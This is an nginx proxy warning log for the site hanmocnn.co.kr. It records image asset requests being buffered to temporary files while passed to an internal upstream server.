2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/93/0000015937 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/93/0000015938 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/93/0000015939 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:51:14 [warn] 933#933: *92816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/94/0000015940 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:56:48 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/94/0000015941 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:56:59 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/94/0000015942 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:56:59 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/94/0000015943 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 22:57:00 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/94/0000015944 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/94/0000015945 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/94/0000015946 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/94/0000015947 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/94/0000015948 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:01:25 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/94/0000015949 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:04:42 [warn] 933#933: *92893 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/95/0000015950 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:04:42 [warn] 933#933: *92893 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/95/0000015951 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:13:02 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/95/0000015952 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:13:02 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/95/0000015953 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:13:03 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/95/0000015954 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:18:32 [warn] 933#933: *92968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/95/0000015955 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:18:32 [warn] 933#933: *92968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/95/0000015956 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/95/0000015957 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/95/0000015958 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/95/0000015959 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:30:07 [warn] 933#933: *93013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/96/0000015960 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:30:07 [warn] 933#933: *93013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/96/0000015961 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/96/0000015962 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/96/0000015963 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/96/0000015964 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:43:40 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/96/0000015965 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:43:46 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/96/0000015966 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:43:50 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/96/0000015967 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:44:00 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/96/0000015968 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/96/0000015969 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/97/0000015970 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000015971 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000015972 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000015973 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000015974 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000015975 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:53:17 [warn] 935#935: *93110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/97/0000015976 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 23:53:17 [warn] 935#935: *93110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000015977 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000015978 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000015979 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000015980 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/98/0000015981 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000015982 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000015983 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000015984 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000015985 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000015986 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000015987 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000015988 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000015989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000015990 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000015991 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000015992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:26:24 [warn] 942#942: *93219 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000015993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:26:24 [warn] 942#942: *93219 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000015994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000015995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000015996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000015997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:38:38 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000015998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:38:38 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000015999 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:38:56 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000016000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:43:22 [warn] 942#942: *93319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000016001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000016002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000016003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000016004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000016005 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000016006 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
